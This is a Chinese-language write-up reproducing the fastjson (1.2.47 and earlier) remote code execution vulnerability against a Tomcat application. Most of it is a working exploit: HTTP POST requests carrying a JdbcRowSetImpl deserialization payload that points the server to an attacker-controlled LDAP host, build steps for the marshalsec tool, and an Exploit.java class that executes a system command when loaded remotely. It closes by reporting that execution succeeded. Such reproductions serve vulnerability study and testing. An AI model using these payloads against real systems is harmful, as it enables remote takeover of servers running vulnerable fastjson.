fastjson1.2.47以下 RCE 漏洞复现

author：test
Ox01 具体环境
War包部署在tomcat,war包使用fastjson解析
tomcat版本

java版本

0x02 尝试是否可以接受请求（也可以没有这一步）
先尝试是否可以收到ldap请求
post数据包如下：

POST /fastjson/ HTTP/1.1
Host: x.x.x.x:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

{
"name":{
   "@type":"java.lang.Class",
   "val":"com.sun.rowset.JdbcRowSetImpl"
},
"f":{      
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x:8080/Exploit","autoCommit":true}}

发送数据报：
[外链图片转存失败(img-Zr7lLvTj-1569073725489)(https://i.loli.net/2019/08/28/qSNUrFeazAE9D1O.png)]
服务端接口请求：

Ox03 构造数据包以及工具
1 用到的工具： https://github.com/mbechler/marshalsec
2 使用maven打包，具体为cd到目录然后 mvn clean package -DskipTests
3 构造数据包
post数据包如下：

POST /fastjson/ HTTP/1.1
Host: 10.x.x.x:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

{
"name":{
   "@type":"java.lang.Class",
   "val":"com.sun.rowset.JdbcRowSetImpl"
},
"f":{      
"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://10.x.x.x:1389/Exploit","autoCommit":true}}

4 构造的恶意java类，需要javac编译成class文件，存放于http服务器，ldap服务指向于http服务
代码命名为：Exploit.java

public class Exploit {
    public Exploit(){
        try {
            Runtime.getRuntime ().exec ( "calc" );
        }catch (Exception e){
            e.printStackTrace ();
        }
    }

    public static void main(String[] args) {
        Exploit e=new Exploit ();
    }
}

编译此java文件

0x04 启动服务，验证是否 可以执行命令
启动各类服务

发送数据包
[外链图片转存失败(img-WffAogyq-1569073725494)(https://i.loli.net/2019/08/28/ul5kdwaSCtj8Ghr.png)]
执行成功